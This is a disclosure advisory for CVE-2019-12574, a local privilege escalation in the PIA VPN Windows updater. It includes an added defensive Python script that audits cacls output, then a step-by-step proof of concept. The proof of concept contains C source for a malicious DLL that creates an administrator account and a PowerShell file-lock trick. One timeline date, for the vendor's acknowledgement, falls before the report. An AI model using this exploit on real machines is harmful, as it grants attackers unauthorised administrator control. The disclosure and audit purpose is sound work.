CVE-2019-12574.txt
Title: PIA Windows Privilege Escalation: DLL Injection
Author: Rich Mirch
CVE: CVE-2019-12574
Vendor Advisory: https://www.privateinternetaccess.com/pages/changelog
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v1.0 for Windows could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA Desktop client is vulnerable to a DLL injection vulnerability during
the update process. The updater loads several DLLs from a folder that
authenticated users have write access to. A low privileged user can leverage
this vulnerability to execute arbitrary code as an administrator.
When an update is available, a low-privilege user is notified in the client and
presented with the option to download it. When clicked, the PIA client sends a
command to the PIA service to download the update. The update is staged in
"C:\ProgramData\Private Internet Access\update\". This directory and all files
within it are removed before the update file is stored there.
A low privileged user can create a file in the update directory and set a lock on
it which prevents the PIA service from deleting it during the download process.
This can be leveraged to stage a malicious DLL that the update process will load.
The next time an administrator opens the PIA client a new option to install the
latest version will be available. When clicked, the updater will install the update
and silently execute arbitrary code as the administrator. This PoC will demonstrate
that a new administrator named "woot" will be added during the update process.
CVSS
Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:R
Base: 6.7
Temporal: 6.3
The following DLLs are loaded by the pia-windows-x64-1.0-02176.exe updater from the update directory:
C:\ProgramData\Private Internet Access\update\spinf.dll
C:\ProgramData\Private Internet Access\update\USERENV.dll
C:\ProgramData\Private Internet Access\update\newdev.dll
C:\ProgramData\Private Internet Access\update\DEVRTL.dll
C:\ProgramData\Private Internet Access\update\DEVOBJ.dll
C:\ProgramData\Private Internet Access\update\drvstore.dll
C:\ProgramData\Private Internet Access\update\PROPSYS.dll
C:\ProgramData\Private Internet Access\update\LINKINFO.dll
C:\ProgramData\Private Internet Access\update\ntshrui.dll
C:\ProgramData\Private Internet Access\update\SspiCli.dll
C:\ProgramData\Private Internet Access\update\srvcli.dll
C:\ProgramData\Private Internet Access\update\cscapi.dll
C:\ProgramData\Private Internet Access\update\CLDAPI.dll
C:\ProgramData\Private Internet Access\update\FLTLIB.DLL
C:\ProgramData\Private Internet Access\update\apphelp.dll
C:\ProgramData\Private Internet Access\update\netutils.dll
Permissions of "c:\ProgramData\Private Internet Access" (cacls output) showing
that BUILTIN\Users has write access:
c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Permissions of "c:\ProgramData\Private Internet Access\update" (cacls output) showing
that the test1 user has full access (see step 2):
c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHAOS\test1:(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
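From the defender's side, the two listings above are exactly what an ACL audit of an updater's staging path should catch: a directory that an elevated process loads DLLs from and that non-administrative principals can write to. The following Python script is an added example, not part of this advisory or of PIA's own code. It parses cacls-style output like the listings above, ignores inherit-only entries (which grant nothing on the directory itself), and reports every principal outside a trusted set that holds a write-capable right on the directory. The trusted-principal set and the tables of write-capable right names are assumptions made for the example; the two listings are reproduced from the advisory as sample input.

```python
import re
from dataclasses import dataclass
from typing import List

# Assumption: principals expected to hold write access on an updater's staging directory.
TRUSTED_PRINCIPALS = {
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
    "NT SERVICE\\TrustedInstaller",
}
# cacls/icacls simple rights that let a principal create or replace files.
WRITE_SIMPLE = {"F", "M", "C", "W"}
# Specific rights (the "(special access:)" form) that do the same.
WRITE_SPECIFIC = {
    "FILE_WRITE_DATA", "FILE_APPEND_DATA", "WRITE_DAC", "WRITE_OWNER",
    "GENERIC_WRITE", "GENERIC_ALL", "FILE_ALL_ACCESS",
}


@dataclass
class Ace:
    principal: str
    flags: List[str]    # e.g. ["OI", "CI", "ID"]
    rights: List[str]   # simple letters such as "F", or specific right names

    @property
    def inherit_only(self) -> bool:
        # (IO) entries apply to children only, never to the directory itself.
        return "IO" in self.flags

    @property
    def grants_write(self) -> bool:
        return any(r in WRITE_SIMPLE or r in WRITE_SPECIFIC for r in self.rights)


ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([A-Z]+\))*)(?P<rest>.*)$")


def parse_cacls(path: str, listing: str) -> List[Ace]:
    """Parse cacls-style output for a single directory into a list of ACEs."""
    aces: List[Ace] = []
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        # The first line carries the directory path in front of the first ACE.
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line) if ":(" in line else None
        if m:
            flags = re.findall(r"\(([A-Z]+)\)", m.group("flags"))
            rest = m.group("rest").strip()
            # "(special access:)" is followed by one right name per line.
            rights = [] if rest.startswith("(special access:)") else [rest]
            aces.append(Ace(m.group("principal").strip(), flags, rights))
        elif aces:
            aces[-1].rights.append(line)
    return aces


def untrusted_writers(aces: List[Ace]) -> List[str]:
    """Principals outside TRUSTED_PRINCIPALS that can write into the directory itself."""
    return sorted({
        a.principal for a in aces
        if a.grants_write and not a.inherit_only and a.principal not in TRUSTED_PRINCIPALS
    })


def audit(path: str, listing: str) -> List[str]:
    return untrusted_writers(parse_cacls(path, listing))


# Sample input: the two listings reproduced from the advisory.
PARENT_DIR = r"c:\ProgramData\Private Internet Access"
PARENT_LISTING = r"""
c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                       BUILTIN\Administrators:(OI)(CI)(ID)F
                                       CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                       BUILTIN\Users:(OI)(CI)(ID)R
                                       BUILTIN\Users:(CI)(ID)(special access:)
                                                     FILE_WRITE_DATA
                                                     FILE_APPEND_DATA
                                                     FILE_WRITE_EA
                                                     FILE_WRITE_ATTRIBUTES
"""
UPDATE_DIR = PARENT_DIR + r"\update"
UPDATE_LISTING = r"""
c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                              BUILTIN\Administrators:(OI)(CI)(ID)F
                                              CHAOS\test1:(ID)F
                                              CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                              BUILTIN\Users:(OI)(CI)(ID)R
                                              BUILTIN\Users:(CI)(ID)(special access:)
                                                            FILE_WRITE_DATA
                                                            FILE_APPEND_DATA
                                                            FILE_WRITE_EA
                                                            FILE_WRITE_ATTRIBUTES
"""

if __name__ == "__main__":
    for directory, listing in ((PARENT_DIR, PARENT_LISTING), (UPDATE_DIR, UPDATE_LISTING)):
        writers = audit(directory, listing)
        verdict = "WRITABLE by " + ", ".join(writers) if writers else "ok"
        print(f"{directory}: {verdict}")
```

Run against the advisory's listings, the script flags BUILTIN\Users on the parent directory (via the FILE_WRITE_DATA special-access entry, even though the simple entry only shows R) and both BUILTIN\Users and CHAOS\test1 on the update directory. In practice the same check is worth running over every directory an elevated installer or service reads executable content from, since a read-only "R" entry beside a "(special access:)" entry is easy to misread as harmless.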
Test Environment
OS: Microsoft Windows 10 Pro 10.0.17763 N/A Build 17763
PIA Version: v0.9.9 beta
PIA Upgrade Version: v1.0
Steps to reproduce
All steps are executed as a low privileged user unless otherwise noted.
1) Open a cmd shell and change to the "C:\ProgramData\Private Internet Access" folder.
cd "c:\ProgramData\Private Internet Access"
2) Create the update folder and change to it.
mkdir update
cd update
3) Create a malicious library to create an administrator account named woot when loaded.
/* Cross compile with:
   x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <stdlib.h>   /* system() */
#include <windows.h>

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
    case DLL_PROCESS_ATTACH:
        /* Runs in the context of whichever process loads the library. */
        system("cmd /c net user woot insertpasswordhere /add");
        system("cmd /c net localgroup administrators woot /add");
        break;
    case DLL_THREAD_ATTACH:
        // Do thread-specific initialization.
        break;
    case DLL_THREAD_DETACH:
        // Do thread-specific cleanup.
        break;
    case DLL_PROCESS_DETACH:
        // Perform any necessary cleanup.
        break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}
4) Copy the malicious DLL into the update folder. For this PoC we will use spinf.dll
as the target.
copy woot.dll spinf.dll
5) Execute PowerShell and set a lock on the spinf.dll file to prevent the library
from being deleted. I appreciate @poshkatz for teaching me how to easily lock files
with PowerShell.
$f = [System.IO.File]::Open("spinf.dll",[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::Read)
6) Verify the lock by typing $f. The output should look like this:
CanRead : True
CanWrite : False
CanSeek : True
IsAsync : False
Length : 287283
Name : c:\ProgramData\Private Internet Access\update\spinf.dll
Position : 0
Handle : 880
SafeFileHandle : Microsoft.Win32.SafeHandles.SafeFileHandle
CanTimeout : False
ReadTimeout :
WriteTimeout :
7) Open the PIA client. An update will be available. Click Download v1.0.0.
8) Now that the update is staged, exit all windows and logout.
9) Login as an Administrator.
10) Open the PIA client and click the update icon in the upper right and then
click the "Install v1.0.0" option. The update will install normally.
11) At this point the "woot" administrator account will exist. Open a cmd shell
and verify.
net user woot
Timeline:
2019-01-13: Reported to vendor
2018-01-13: Vendor acknowledged receipt of report
2019-01-22: Vendor released fix in v1.0.1
2019-06-10: Public disclosure